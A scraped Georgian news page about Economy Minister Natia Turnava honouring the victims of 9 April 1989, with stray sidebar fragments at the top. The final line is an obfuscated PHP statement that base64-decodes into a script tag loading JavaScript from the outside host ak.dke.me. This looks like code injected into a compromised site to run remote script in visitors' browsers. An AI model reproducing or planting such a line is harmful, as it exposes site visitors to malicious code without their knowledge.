celsiusi
ავერსი საქკაბელი
ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ 1989 წლის 9 აპრილს საქართველოს დამოუკიდებლობისა და თავისუფლებისთვის დაღუპულთა ხსოვნას პატივი მიაგო.
 
“32 წლის წინ ამ ტრაგიკულმა დღემ ფაქტობრივად შეცვალა ჩვენი ქვეყნის აწმყო და განსაზღვრა მომავალი. ქედს ვიხრი  იმ ადამიანების წინაშე, ვინც საკუთარი სიცოცხლის ფასად დაიცვა თავისუფლების იდეა და ოცნება.  
ამ დღეს ქართველმა ხალხმა ხმამაღლა განაცხადა ურყევი გადაწყვეტილება დამოუკიდებლობის აღდგენის შესახებ. სწორედ გმირულად დაღუპულთა უდიდესი წვლილია, რომ ეს ხმამაღალი განაცხადი 2 წლის შემდეგ რეალობად იქცა და საქართველოს დამოუკიდებლობის და სახელმწიფოებრიობის აღდგენით დაგვირგვინდა.
მადლობა გმირებს ჩვენი თავისუფლებისთვის.”- აცხადებს თურნავა.
 
1454
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");